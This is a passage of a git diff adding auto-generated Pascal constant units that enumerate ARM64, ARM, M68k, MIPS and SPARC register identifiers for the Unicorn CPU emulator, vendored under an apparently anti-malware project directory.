+ UC_ARM64_REG_B5 = 13; + UC_ARM64_REG_B6 = 14; + UC_ARM64_REG_B7 = 15; + UC_ARM64_REG_B8 = 16; + UC_ARM64_REG_B9 = 17; + UC_ARM64_REG_B10 = 18; + UC_ARM64_REG_B11 = 19; + UC_ARM64_REG_B12 = 20; + UC_ARM64_REG_B13 = 21; + UC_ARM64_REG_B14 = 22; + UC_ARM64_REG_B15 = 23; + UC_ARM64_REG_B16 = 24; + UC_ARM64_REG_B17 = 25; + UC_ARM64_REG_B18 = 26; + UC_ARM64_REG_B19 = 27; + UC_ARM64_REG_B20 = 28; + UC_ARM64_REG_B21 = 29; + UC_ARM64_REG_B22 = 30; + UC_ARM64_REG_B23 = 31; + UC_ARM64_REG_B24 = 32; + UC_ARM64_REG_B25 = 33; + UC_ARM64_REG_B26 = 34; + UC_ARM64_REG_B27 = 35; + UC_ARM64_REG_B28 = 36; + UC_ARM64_REG_B29 = 37; + UC_ARM64_REG_B30 = 38; + UC_ARM64_REG_B31 = 39; + UC_ARM64_REG_D0 = 40; + UC_ARM64_REG_D1 = 41; + UC_ARM64_REG_D2 = 42; + UC_ARM64_REG_D3 = 43; + UC_ARM64_REG_D4 = 44; + UC_ARM64_REG_D5 = 45; + UC_ARM64_REG_D6 = 46; + UC_ARM64_REG_D7 = 47; + UC_ARM64_REG_D8 = 48; + UC_ARM64_REG_D9 = 49; + UC_ARM64_REG_D10 
= 50; + UC_ARM64_REG_D11 = 51; + UC_ARM64_REG_D12 = 52; + UC_ARM64_REG_D13 = 53; + UC_ARM64_REG_D14 = 54; + UC_ARM64_REG_D15 = 55; + UC_ARM64_REG_D16 = 56; + UC_ARM64_REG_D17 = 57; + UC_ARM64_REG_D18 = 58; + UC_ARM64_REG_D19 = 59; + UC_ARM64_REG_D20 = 60; + UC_ARM64_REG_D21 = 61; + UC_ARM64_REG_D22 = 62; + UC_ARM64_REG_D23 = 63; + UC_ARM64_REG_D24 = 64; + UC_ARM64_REG_D25 = 65; + UC_ARM64_REG_D26 = 66; + UC_ARM64_REG_D27 = 67; + UC_ARM64_REG_D28 = 68; + UC_ARM64_REG_D29 = 69; + UC_ARM64_REG_D30 = 70; + UC_ARM64_REG_D31 = 71; + UC_ARM64_REG_H0 = 72; + UC_ARM64_REG_H1 = 73; + UC_ARM64_REG_H2 = 74; + UC_ARM64_REG_H3 = 75; + UC_ARM64_REG_H4 = 76; + UC_ARM64_REG_H5 = 77; + UC_ARM64_REG_H6 = 78; + UC_ARM64_REG_H7 = 79; + UC_ARM64_REG_H8 = 80; + UC_ARM64_REG_H9 = 81; + UC_ARM64_REG_H10 = 82; + UC_ARM64_REG_H11 = 83; + UC_ARM64_REG_H12 = 84; + UC_ARM64_REG_H13 = 85; + UC_ARM64_REG_H14 = 86; + UC_ARM64_REG_H15 = 87; + UC_ARM64_REG_H16 = 88; + UC_ARM64_REG_H17 = 89; + UC_ARM64_REG_H18 = 90; + UC_ARM64_REG_H19 = 91; + UC_ARM64_REG_H20 = 92; + UC_ARM64_REG_H21 = 93; + UC_ARM64_REG_H22 = 94; + UC_ARM64_REG_H23 = 95; + UC_ARM64_REG_H24 = 96; + UC_ARM64_REG_H25 = 97; + UC_ARM64_REG_H26 = 98; + UC_ARM64_REG_H27 = 99; + UC_ARM64_REG_H28 = 100; + UC_ARM64_REG_H29 = 101; + UC_ARM64_REG_H30 = 102; + UC_ARM64_REG_H31 = 103; + UC_ARM64_REG_Q0 = 104; + UC_ARM64_REG_Q1 = 105; + UC_ARM64_REG_Q2 = 106; + UC_ARM64_REG_Q3 = 107; + UC_ARM64_REG_Q4 = 108; + UC_ARM64_REG_Q5 = 109; + UC_ARM64_REG_Q6 = 110; + UC_ARM64_REG_Q7 = 111; + UC_ARM64_REG_Q8 = 112; + UC_ARM64_REG_Q9 = 113; + UC_ARM64_REG_Q10 = 114; + UC_ARM64_REG_Q11 = 115; + UC_ARM64_REG_Q12 = 116; + UC_ARM64_REG_Q13 = 117; + UC_ARM64_REG_Q14 = 118; + UC_ARM64_REG_Q15 = 119; + UC_ARM64_REG_Q16 = 120; + UC_ARM64_REG_Q17 = 121; + UC_ARM64_REG_Q18 = 122; + UC_ARM64_REG_Q19 = 123; + UC_ARM64_REG_Q20 = 124; + UC_ARM64_REG_Q21 = 125; + UC_ARM64_REG_Q22 = 126; + UC_ARM64_REG_Q23 = 127; + UC_ARM64_REG_Q24 = 128; + UC_ARM64_REG_Q25 = 129; + 
UC_ARM64_REG_Q26 = 130; + UC_ARM64_REG_Q27 = 131; + UC_ARM64_REG_Q28 = 132; + UC_ARM64_REG_Q29 = 133; + UC_ARM64_REG_Q30 = 134; + UC_ARM64_REG_Q31 = 135; + UC_ARM64_REG_S0 = 136; + UC_ARM64_REG_S1 = 137; + UC_ARM64_REG_S2 = 138; + UC_ARM64_REG_S3 = 139; + UC_ARM64_REG_S4 = 140; + UC_ARM64_REG_S5 = 141; + UC_ARM64_REG_S6 = 142; + UC_ARM64_REG_S7 = 143; + UC_ARM64_REG_S8 = 144; + UC_ARM64_REG_S9 = 145; + UC_ARM64_REG_S10 = 146; + UC_ARM64_REG_S11 = 147; + UC_ARM64_REG_S12 = 148; + UC_ARM64_REG_S13 = 149; + UC_ARM64_REG_S14 = 150; + UC_ARM64_REG_S15 = 151; + UC_ARM64_REG_S16 = 152; + UC_ARM64_REG_S17 = 153; + UC_ARM64_REG_S18 = 154; + UC_ARM64_REG_S19 = 155; + UC_ARM64_REG_S20 = 156; + UC_ARM64_REG_S21 = 157; + UC_ARM64_REG_S22 = 158; + UC_ARM64_REG_S23 = 159; + UC_ARM64_REG_S24 = 160; + UC_ARM64_REG_S25 = 161; + UC_ARM64_REG_S26 = 162; + UC_ARM64_REG_S27 = 163; + UC_ARM64_REG_S28 = 164; + UC_ARM64_REG_S29 = 165; + UC_ARM64_REG_S30 = 166; + UC_ARM64_REG_S31 = 167; + UC_ARM64_REG_W0 = 168; + UC_ARM64_REG_W1 = 169; + UC_ARM64_REG_W2 = 170; + UC_ARM64_REG_W3 = 171; + UC_ARM64_REG_W4 = 172; + UC_ARM64_REG_W5 = 173; + UC_ARM64_REG_W6 = 174; + UC_ARM64_REG_W7 = 175; + UC_ARM64_REG_W8 = 176; + UC_ARM64_REG_W9 = 177; + UC_ARM64_REG_W10 = 178; + UC_ARM64_REG_W11 = 179; + UC_ARM64_REG_W12 = 180; + UC_ARM64_REG_W13 = 181; + UC_ARM64_REG_W14 = 182; + UC_ARM64_REG_W15 = 183; + UC_ARM64_REG_W16 = 184; + UC_ARM64_REG_W17 = 185; + UC_ARM64_REG_W18 = 186; + UC_ARM64_REG_W19 = 187; + UC_ARM64_REG_W20 = 188; + UC_ARM64_REG_W21 = 189; + UC_ARM64_REG_W22 = 190; + UC_ARM64_REG_W23 = 191; + UC_ARM64_REG_W24 = 192; + UC_ARM64_REG_W25 = 193; + UC_ARM64_REG_W26 = 194; + UC_ARM64_REG_W27 = 195; + UC_ARM64_REG_W28 = 196; + UC_ARM64_REG_W29 = 197; + UC_ARM64_REG_W30 = 198; + UC_ARM64_REG_X0 = 199; + UC_ARM64_REG_X1 = 200; + UC_ARM64_REG_X2 = 201; + UC_ARM64_REG_X3 = 202; + UC_ARM64_REG_X4 = 203; + UC_ARM64_REG_X5 = 204; + UC_ARM64_REG_X6 = 205; + UC_ARM64_REG_X7 = 206; + UC_ARM64_REG_X8 = 207; + 
UC_ARM64_REG_X9 = 208; + UC_ARM64_REG_X10 = 209; + UC_ARM64_REG_X11 = 210; + UC_ARM64_REG_X12 = 211; + UC_ARM64_REG_X13 = 212; + UC_ARM64_REG_X14 = 213; + UC_ARM64_REG_X15 = 214; + UC_ARM64_REG_X16 = 215; + UC_ARM64_REG_X17 = 216; + UC_ARM64_REG_X18 = 217; + UC_ARM64_REG_X19 = 218; + UC_ARM64_REG_X20 = 219; + UC_ARM64_REG_X21 = 220; + UC_ARM64_REG_X22 = 221; + UC_ARM64_REG_X23 = 222; + UC_ARM64_REG_X24 = 223; + UC_ARM64_REG_X25 = 224; + UC_ARM64_REG_X26 = 225; + UC_ARM64_REG_X27 = 226; + UC_ARM64_REG_X28 = 227; + UC_ARM64_REG_V0 = 228; + UC_ARM64_REG_V1 = 229; + UC_ARM64_REG_V2 = 230; + UC_ARM64_REG_V3 = 231; + UC_ARM64_REG_V4 = 232; + UC_ARM64_REG_V5 = 233; + UC_ARM64_REG_V6 = 234; + UC_ARM64_REG_V7 = 235; + UC_ARM64_REG_V8 = 236; + UC_ARM64_REG_V9 = 237; + UC_ARM64_REG_V10 = 238; + UC_ARM64_REG_V11 = 239; + UC_ARM64_REG_V12 = 240; + UC_ARM64_REG_V13 = 241; + UC_ARM64_REG_V14 = 242; + UC_ARM64_REG_V15 = 243; + UC_ARM64_REG_V16 = 244; + UC_ARM64_REG_V17 = 245; + UC_ARM64_REG_V18 = 246; + UC_ARM64_REG_V19 = 247; + UC_ARM64_REG_V20 = 248; + UC_ARM64_REG_V21 = 249; + UC_ARM64_REG_V22 = 250; + UC_ARM64_REG_V23 = 251; + UC_ARM64_REG_V24 = 252; + UC_ARM64_REG_V25 = 253; + UC_ARM64_REG_V26 = 254; + UC_ARM64_REG_V27 = 255; + UC_ARM64_REG_V28 = 256; + UC_ARM64_REG_V29 = 257; + UC_ARM64_REG_V30 = 258; + UC_ARM64_REG_V31 = 259; + +// pseudo registers + UC_ARM64_REG_PC = 260; + UC_ARM64_REG_CPACR_EL1 = 261; + +// thread registers + UC_ARM64_REG_TPIDR_EL0 = 262; + UC_ARM64_REG_TPIDRRO_EL0 = 263; + UC_ARM64_REG_TPIDR_EL1 = 264; + UC_ARM64_REG_PSTATE = 265; + +// exception link registers + UC_ARM64_REG_ELR_EL0 = 266; + UC_ARM64_REG_ELR_EL1 = 267; + UC_ARM64_REG_ELR_EL2 = 268; + UC_ARM64_REG_ELR_EL3 = 269; + +// stack pointers registers + UC_ARM64_REG_SP_EL0 = 270; + UC_ARM64_REG_SP_EL1 = 271; + UC_ARM64_REG_SP_EL2 = 272; + UC_ARM64_REG_SP_EL3 = 273; + +// other CP15 registers + UC_ARM64_REG_TTBR0_EL1 = 274; + UC_ARM64_REG_TTBR1_EL1 = 275; + UC_ARM64_REG_ESR_EL0 = 276; + 
UC_ARM64_REG_ESR_EL1 = 277; + UC_ARM64_REG_ESR_EL2 = 278; + UC_ARM64_REG_ESR_EL3 = 279; + UC_ARM64_REG_FAR_EL0 = 280; + UC_ARM64_REG_FAR_EL1 = 281; + UC_ARM64_REG_FAR_EL2 = 282; + UC_ARM64_REG_FAR_EL3 = 283; + UC_ARM64_REG_PAR_EL1 = 284; + UC_ARM64_REG_MAIR_EL1 = 285; + UC_ARM64_REG_VBAR_EL0 = 286; + UC_ARM64_REG_VBAR_EL1 = 287; + UC_ARM64_REG_VBAR_EL2 = 288; + UC_ARM64_REG_VBAR_EL3 = 289; + UC_ARM64_REG_ENDING = 290; + +// alias registers + UC_ARM64_REG_IP0 = 215; + UC_ARM64_REG_IP1 = 216; + UC_ARM64_REG_FP = 1; + UC_ARM64_REG_LR = 2; + +implementation +end. \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/pascal/unicorn/ArmConst.pas b/ai_anti_malware/unicorn/unicorn-master/bindings/pascal/unicorn/ArmConst.pas new file mode 100644 index 0000000..eb9fc46 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/pascal/unicorn/ArmConst.pas @@ -0,0 +1,140 @@ +// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT + +unit ArmConst; + +interface + +const +// ARM registers + + UC_ARM_REG_INVALID = 0; + UC_ARM_REG_APSR = 1; + UC_ARM_REG_APSR_NZCV = 2; + UC_ARM_REG_CPSR = 3; + UC_ARM_REG_FPEXC = 4; + UC_ARM_REG_FPINST = 5; + UC_ARM_REG_FPSCR = 6; + UC_ARM_REG_FPSCR_NZCV = 7; + UC_ARM_REG_FPSID = 8; + UC_ARM_REG_ITSTATE = 9; + UC_ARM_REG_LR = 10; + UC_ARM_REG_PC = 11; + UC_ARM_REG_SP = 12; + UC_ARM_REG_SPSR = 13; + UC_ARM_REG_D0 = 14; + UC_ARM_REG_D1 = 15; + UC_ARM_REG_D2 = 16; + UC_ARM_REG_D3 = 17; + UC_ARM_REG_D4 = 18; + UC_ARM_REG_D5 = 19; + UC_ARM_REG_D6 = 20; + UC_ARM_REG_D7 = 21; + UC_ARM_REG_D8 = 22; + UC_ARM_REG_D9 = 23; + UC_ARM_REG_D10 = 24; + UC_ARM_REG_D11 = 25; + UC_ARM_REG_D12 = 26; + UC_ARM_REG_D13 = 27; + UC_ARM_REG_D14 = 28; + UC_ARM_REG_D15 = 29; + UC_ARM_REG_D16 = 30; + UC_ARM_REG_D17 = 31; + UC_ARM_REG_D18 = 32; + UC_ARM_REG_D19 = 33; + UC_ARM_REG_D20 = 34; + UC_ARM_REG_D21 = 35; + UC_ARM_REG_D22 = 36; + UC_ARM_REG_D23 = 37; + UC_ARM_REG_D24 = 38; + UC_ARM_REG_D25 = 39; + UC_ARM_REG_D26 = 40; + 
UC_ARM_REG_D27 = 41; + UC_ARM_REG_D28 = 42; + UC_ARM_REG_D29 = 43; + UC_ARM_REG_D30 = 44; + UC_ARM_REG_D31 = 45; + UC_ARM_REG_FPINST2 = 46; + UC_ARM_REG_MVFR0 = 47; + UC_ARM_REG_MVFR1 = 48; + UC_ARM_REG_MVFR2 = 49; + UC_ARM_REG_Q0 = 50; + UC_ARM_REG_Q1 = 51; + UC_ARM_REG_Q2 = 52; + UC_ARM_REG_Q3 = 53; + UC_ARM_REG_Q4 = 54; + UC_ARM_REG_Q5 = 55; + UC_ARM_REG_Q6 = 56; + UC_ARM_REG_Q7 = 57; + UC_ARM_REG_Q8 = 58; + UC_ARM_REG_Q9 = 59; + UC_ARM_REG_Q10 = 60; + UC_ARM_REG_Q11 = 61; + UC_ARM_REG_Q12 = 62; + UC_ARM_REG_Q13 = 63; + UC_ARM_REG_Q14 = 64; + UC_ARM_REG_Q15 = 65; + UC_ARM_REG_R0 = 66; + UC_ARM_REG_R1 = 67; + UC_ARM_REG_R2 = 68; + UC_ARM_REG_R3 = 69; + UC_ARM_REG_R4 = 70; + UC_ARM_REG_R5 = 71; + UC_ARM_REG_R6 = 72; + UC_ARM_REG_R7 = 73; + UC_ARM_REG_R8 = 74; + UC_ARM_REG_R9 = 75; + UC_ARM_REG_R10 = 76; + UC_ARM_REG_R11 = 77; + UC_ARM_REG_R12 = 78; + UC_ARM_REG_S0 = 79; + UC_ARM_REG_S1 = 80; + UC_ARM_REG_S2 = 81; + UC_ARM_REG_S3 = 82; + UC_ARM_REG_S4 = 83; + UC_ARM_REG_S5 = 84; + UC_ARM_REG_S6 = 85; + UC_ARM_REG_S7 = 86; + UC_ARM_REG_S8 = 87; + UC_ARM_REG_S9 = 88; + UC_ARM_REG_S10 = 89; + UC_ARM_REG_S11 = 90; + UC_ARM_REG_S12 = 91; + UC_ARM_REG_S13 = 92; + UC_ARM_REG_S14 = 93; + UC_ARM_REG_S15 = 94; + UC_ARM_REG_S16 = 95; + UC_ARM_REG_S17 = 96; + UC_ARM_REG_S18 = 97; + UC_ARM_REG_S19 = 98; + UC_ARM_REG_S20 = 99; + UC_ARM_REG_S21 = 100; + UC_ARM_REG_S22 = 101; + UC_ARM_REG_S23 = 102; + UC_ARM_REG_S24 = 103; + UC_ARM_REG_S25 = 104; + UC_ARM_REG_S26 = 105; + UC_ARM_REG_S27 = 106; + UC_ARM_REG_S28 = 107; + UC_ARM_REG_S29 = 108; + UC_ARM_REG_S30 = 109; + UC_ARM_REG_S31 = 110; + UC_ARM_REG_C1_C0_2 = 111; + UC_ARM_REG_C13_C0_2 = 112; + UC_ARM_REG_C13_C0_3 = 113; + UC_ARM_REG_IPSR = 114; + UC_ARM_REG_MSP = 115; + UC_ARM_REG_PSP = 116; + UC_ARM_REG_CONTROL = 117; + UC_ARM_REG_ENDING = 118; + +// alias registers + UC_ARM_REG_R13 = 12; + UC_ARM_REG_R14 = 10; + UC_ARM_REG_R15 = 11; + UC_ARM_REG_SB = 75; + UC_ARM_REG_SL = 76; + UC_ARM_REG_FP = 77; + UC_ARM_REG_IP = 78; + 
+implementation +end. \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/pascal/unicorn/M68kConst.pas b/ai_anti_malware/unicorn/unicorn-master/bindings/pascal/unicorn/M68kConst.pas new file mode 100644 index 0000000..be78f78 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/pascal/unicorn/M68kConst.pas @@ -0,0 +1,32 @@ +// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT + +unit M68kConst; + +interface + +const +// M68K registers + + UC_M68K_REG_INVALID = 0; + UC_M68K_REG_A0 = 1; + UC_M68K_REG_A1 = 2; + UC_M68K_REG_A2 = 3; + UC_M68K_REG_A3 = 4; + UC_M68K_REG_A4 = 5; + UC_M68K_REG_A5 = 6; + UC_M68K_REG_A6 = 7; + UC_M68K_REG_A7 = 8; + UC_M68K_REG_D0 = 9; + UC_M68K_REG_D1 = 10; + UC_M68K_REG_D2 = 11; + UC_M68K_REG_D3 = 12; + UC_M68K_REG_D4 = 13; + UC_M68K_REG_D5 = 14; + UC_M68K_REG_D6 = 15; + UC_M68K_REG_D7 = 16; + UC_M68K_REG_SR = 17; + UC_M68K_REG_PC = 18; + UC_M68K_REG_ENDING = 19; + +implementation +end. \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/pascal/unicorn/MipsConst.pas b/ai_anti_malware/unicorn/unicorn-master/bindings/pascal/unicorn/MipsConst.pas new file mode 100644 index 0000000..b4ef27e --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/pascal/unicorn/MipsConst.pas @@ -0,0 +1,205 @@ +// For Unicorn Engine. 
AUTO-GENERATED FILE, DO NOT EDIT + +unit MipsConst; + +interface + +const +// MIPS registers + + UC_MIPS_REG_INVALID = 0; + +// General purpose registers + UC_MIPS_REG_PC = 1; + UC_MIPS_REG_0 = 2; + UC_MIPS_REG_1 = 3; + UC_MIPS_REG_2 = 4; + UC_MIPS_REG_3 = 5; + UC_MIPS_REG_4 = 6; + UC_MIPS_REG_5 = 7; + UC_MIPS_REG_6 = 8; + UC_MIPS_REG_7 = 9; + UC_MIPS_REG_8 = 10; + UC_MIPS_REG_9 = 11; + UC_MIPS_REG_10 = 12; + UC_MIPS_REG_11 = 13; + UC_MIPS_REG_12 = 14; + UC_MIPS_REG_13 = 15; + UC_MIPS_REG_14 = 16; + UC_MIPS_REG_15 = 17; + UC_MIPS_REG_16 = 18; + UC_MIPS_REG_17 = 19; + UC_MIPS_REG_18 = 20; + UC_MIPS_REG_19 = 21; + UC_MIPS_REG_20 = 22; + UC_MIPS_REG_21 = 23; + UC_MIPS_REG_22 = 24; + UC_MIPS_REG_23 = 25; + UC_MIPS_REG_24 = 26; + UC_MIPS_REG_25 = 27; + UC_MIPS_REG_26 = 28; + UC_MIPS_REG_27 = 29; + UC_MIPS_REG_28 = 30; + UC_MIPS_REG_29 = 31; + UC_MIPS_REG_30 = 32; + UC_MIPS_REG_31 = 33; + +// DSP registers + UC_MIPS_REG_DSPCCOND = 34; + UC_MIPS_REG_DSPCARRY = 35; + UC_MIPS_REG_DSPEFI = 36; + UC_MIPS_REG_DSPOUTFLAG = 37; + UC_MIPS_REG_DSPOUTFLAG16_19 = 38; + UC_MIPS_REG_DSPOUTFLAG20 = 39; + UC_MIPS_REG_DSPOUTFLAG21 = 40; + UC_MIPS_REG_DSPOUTFLAG22 = 41; + UC_MIPS_REG_DSPOUTFLAG23 = 42; + UC_MIPS_REG_DSPPOS = 43; + UC_MIPS_REG_DSPSCOUNT = 44; + +// ACC registers + UC_MIPS_REG_AC0 = 45; + UC_MIPS_REG_AC1 = 46; + UC_MIPS_REG_AC2 = 47; + UC_MIPS_REG_AC3 = 48; + +// COP registers + UC_MIPS_REG_CC0 = 49; + UC_MIPS_REG_CC1 = 50; + UC_MIPS_REG_CC2 = 51; + UC_MIPS_REG_CC3 = 52; + UC_MIPS_REG_CC4 = 53; + UC_MIPS_REG_CC5 = 54; + UC_MIPS_REG_CC6 = 55; + UC_MIPS_REG_CC7 = 56; + +// FPU registers + UC_MIPS_REG_F0 = 57; + UC_MIPS_REG_F1 = 58; + UC_MIPS_REG_F2 = 59; + UC_MIPS_REG_F3 = 60; + UC_MIPS_REG_F4 = 61; + UC_MIPS_REG_F5 = 62; + UC_MIPS_REG_F6 = 63; + UC_MIPS_REG_F7 = 64; + UC_MIPS_REG_F8 = 65; + UC_MIPS_REG_F9 = 66; + UC_MIPS_REG_F10 = 67; + UC_MIPS_REG_F11 = 68; + UC_MIPS_REG_F12 = 69; + UC_MIPS_REG_F13 = 70; + UC_MIPS_REG_F14 = 71; + UC_MIPS_REG_F15 = 72; + UC_MIPS_REG_F16 = 
73; + UC_MIPS_REG_F17 = 74; + UC_MIPS_REG_F18 = 75; + UC_MIPS_REG_F19 = 76; + UC_MIPS_REG_F20 = 77; + UC_MIPS_REG_F21 = 78; + UC_MIPS_REG_F22 = 79; + UC_MIPS_REG_F23 = 80; + UC_MIPS_REG_F24 = 81; + UC_MIPS_REG_F25 = 82; + UC_MIPS_REG_F26 = 83; + UC_MIPS_REG_F27 = 84; + UC_MIPS_REG_F28 = 85; + UC_MIPS_REG_F29 = 86; + UC_MIPS_REG_F30 = 87; + UC_MIPS_REG_F31 = 88; + UC_MIPS_REG_FCC0 = 89; + UC_MIPS_REG_FCC1 = 90; + UC_MIPS_REG_FCC2 = 91; + UC_MIPS_REG_FCC3 = 92; + UC_MIPS_REG_FCC4 = 93; + UC_MIPS_REG_FCC5 = 94; + UC_MIPS_REG_FCC6 = 95; + UC_MIPS_REG_FCC7 = 96; + +// AFPR128 + UC_MIPS_REG_W0 = 97; + UC_MIPS_REG_W1 = 98; + UC_MIPS_REG_W2 = 99; + UC_MIPS_REG_W3 = 100; + UC_MIPS_REG_W4 = 101; + UC_MIPS_REG_W5 = 102; + UC_MIPS_REG_W6 = 103; + UC_MIPS_REG_W7 = 104; + UC_MIPS_REG_W8 = 105; + UC_MIPS_REG_W9 = 106; + UC_MIPS_REG_W10 = 107; + UC_MIPS_REG_W11 = 108; + UC_MIPS_REG_W12 = 109; + UC_MIPS_REG_W13 = 110; + UC_MIPS_REG_W14 = 111; + UC_MIPS_REG_W15 = 112; + UC_MIPS_REG_W16 = 113; + UC_MIPS_REG_W17 = 114; + UC_MIPS_REG_W18 = 115; + UC_MIPS_REG_W19 = 116; + UC_MIPS_REG_W20 = 117; + UC_MIPS_REG_W21 = 118; + UC_MIPS_REG_W22 = 119; + UC_MIPS_REG_W23 = 120; + UC_MIPS_REG_W24 = 121; + UC_MIPS_REG_W25 = 122; + UC_MIPS_REG_W26 = 123; + UC_MIPS_REG_W27 = 124; + UC_MIPS_REG_W28 = 125; + UC_MIPS_REG_W29 = 126; + UC_MIPS_REG_W30 = 127; + UC_MIPS_REG_W31 = 128; + UC_MIPS_REG_HI = 129; + UC_MIPS_REG_LO = 130; + UC_MIPS_REG_P0 = 131; + UC_MIPS_REG_P1 = 132; + UC_MIPS_REG_P2 = 133; + UC_MIPS_REG_MPL0 = 134; + UC_MIPS_REG_MPL1 = 135; + UC_MIPS_REG_MPL2 = 136; + UC_MIPS_REG_CP0_CONFIG3 = 137; + UC_MIPS_REG_CP0_USERLOCAL = 138; + UC_MIPS_REG_ENDING = 139; + UC_MIPS_REG_ZERO = 2; + UC_MIPS_REG_AT = 3; + UC_MIPS_REG_V0 = 4; + UC_MIPS_REG_V1 = 5; + UC_MIPS_REG_A0 = 6; + UC_MIPS_REG_A1 = 7; + UC_MIPS_REG_A2 = 8; + UC_MIPS_REG_A3 = 9; + UC_MIPS_REG_T0 = 10; + UC_MIPS_REG_T1 = 11; + UC_MIPS_REG_T2 = 12; + UC_MIPS_REG_T3 = 13; + UC_MIPS_REG_T4 = 14; + UC_MIPS_REG_T5 = 15; + UC_MIPS_REG_T6 = 16; + 
UC_MIPS_REG_T7 = 17; + UC_MIPS_REG_S0 = 18; + UC_MIPS_REG_S1 = 19; + UC_MIPS_REG_S2 = 20; + UC_MIPS_REG_S3 = 21; + UC_MIPS_REG_S4 = 22; + UC_MIPS_REG_S5 = 23; + UC_MIPS_REG_S6 = 24; + UC_MIPS_REG_S7 = 25; + UC_MIPS_REG_T8 = 26; + UC_MIPS_REG_T9 = 27; + UC_MIPS_REG_K0 = 28; + UC_MIPS_REG_K1 = 29; + UC_MIPS_REG_GP = 30; + UC_MIPS_REG_SP = 31; + UC_MIPS_REG_FP = 32; + UC_MIPS_REG_S8 = 32; + UC_MIPS_REG_RA = 33; + UC_MIPS_REG_HI0 = 45; + UC_MIPS_REG_HI1 = 46; + UC_MIPS_REG_HI2 = 47; + UC_MIPS_REG_HI3 = 48; + UC_MIPS_REG_LO0 = 45; + UC_MIPS_REG_LO1 = 46; + UC_MIPS_REG_LO2 = 47; + UC_MIPS_REG_LO3 = 48; + +implementation +end. \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/pascal/unicorn/SparcConst.pas b/ai_anti_malware/unicorn/unicorn-master/bindings/pascal/unicorn/SparcConst.pas new file mode 100644 index 0000000..32ed301 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/pascal/unicorn/SparcConst.pas @@ -0,0 +1,104 @@ +// For Unicorn Engine. 
AUTO-GENERATED FILE, DO NOT EDIT + +unit SparcConst; + +interface + +const +// SPARC registers + + UC_SPARC_REG_INVALID = 0; + UC_SPARC_REG_F0 = 1; + UC_SPARC_REG_F1 = 2; + UC_SPARC_REG_F2 = 3; + UC_SPARC_REG_F3 = 4; + UC_SPARC_REG_F4 = 5; + UC_SPARC_REG_F5 = 6; + UC_SPARC_REG_F6 = 7; + UC_SPARC_REG_F7 = 8; + UC_SPARC_REG_F8 = 9; + UC_SPARC_REG_F9 = 10; + UC_SPARC_REG_F10 = 11; + UC_SPARC_REG_F11 = 12; + UC_SPARC_REG_F12 = 13; + UC_SPARC_REG_F13 = 14; + UC_SPARC_REG_F14 = 15; + UC_SPARC_REG_F15 = 16; + UC_SPARC_REG_F16 = 17; + UC_SPARC_REG_F17 = 18; + UC_SPARC_REG_F18 = 19; + UC_SPARC_REG_F19 = 20; + UC_SPARC_REG_F20 = 21; + UC_SPARC_REG_F21 = 22; + UC_SPARC_REG_F22 = 23; + UC_SPARC_REG_F23 = 24; + UC_SPARC_REG_F24 = 25; + UC_SPARC_REG_F25 = 26; + UC_SPARC_REG_F26 = 27; + UC_SPARC_REG_F27 = 28; + UC_SPARC_REG_F28 = 29; + UC_SPARC_REG_F29 = 30; + UC_SPARC_REG_F30 = 31; + UC_SPARC_REG_F31 = 32; + UC_SPARC_REG_F32 = 33; + UC_SPARC_REG_F34 = 34; + UC_SPARC_REG_F36 = 35; + UC_SPARC_REG_F38 = 36; + UC_SPARC_REG_F40 = 37; + UC_SPARC_REG_F42 = 38; + UC_SPARC_REG_F44 = 39; + UC_SPARC_REG_F46 = 40; + UC_SPARC_REG_F48 = 41; + UC_SPARC_REG_F50 = 42; + UC_SPARC_REG_F52 = 43; + UC_SPARC_REG_F54 = 44; + UC_SPARC_REG_F56 = 45; + UC_SPARC_REG_F58 = 46; + UC_SPARC_REG_F60 = 47; + UC_SPARC_REG_F62 = 48; + UC_SPARC_REG_FCC0 = 49; + UC_SPARC_REG_FCC1 = 50; + UC_SPARC_REG_FCC2 = 51; + UC_SPARC_REG_FCC3 = 52; + UC_SPARC_REG_G0 = 53; + UC_SPARC_REG_G1 = 54; + UC_SPARC_REG_G2 = 55; + UC_SPARC_REG_G3 = 56; + UC_SPARC_REG_G4 = 57; + UC_SPARC_REG_G5 = 58; + UC_SPARC_REG_G6 = 59; + UC_SPARC_REG_G7 = 60; + UC_SPARC_REG_I0 = 61; + UC_SPARC_REG_I1 = 62; + UC_SPARC_REG_I2 = 63; + UC_SPARC_REG_I3 = 64; + UC_SPARC_REG_I4 = 65; + UC_SPARC_REG_I5 = 66; + UC_SPARC_REG_FP = 67; + UC_SPARC_REG_I7 = 68; + UC_SPARC_REG_ICC = 69; + UC_SPARC_REG_L0 = 70; + UC_SPARC_REG_L1 = 71; + UC_SPARC_REG_L2 = 72; + UC_SPARC_REG_L3 = 73; + UC_SPARC_REG_L4 = 74; + UC_SPARC_REG_L5 = 75; + UC_SPARC_REG_L6 = 76; + 
UC_SPARC_REG_L7 = 77; + UC_SPARC_REG_O0 = 78; + UC_SPARC_REG_O1 = 79; + UC_SPARC_REG_O2 = 80; + UC_SPARC_REG_O3 = 81; + UC_SPARC_REG_O4 = 82; + UC_SPARC_REG_O5 = 83; + UC_SPARC_REG_SP = 84; + UC_SPARC_REG_O7 = 85; + UC_SPARC_REG_Y = 86; + UC_SPARC_REG_XCC = 87; + UC_SPARC_REG_PC = 88; + UC_SPARC_REG_ENDING = 89; + UC_SPARC_REG_O6 = 84; + UC_SPARC_REG_I6 = 67; + +implementation +end. \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/pascal/unicorn/UnicornConst.pas b/ai_anti_malware/unicorn/unicorn-master/bindings/pascal/unicorn/UnicornConst.pas new file mode 100644 index 0000000..7337543 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/pascal/unicorn/UnicornConst.pas @@ -0,0 +1,116 @@ +// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT + +unit UnicornConst; + +interface + +const UC_API_MAJOR = 1; + + UC_API_MINOR = 0; + UC_VERSION_MAJOR = 1; + + 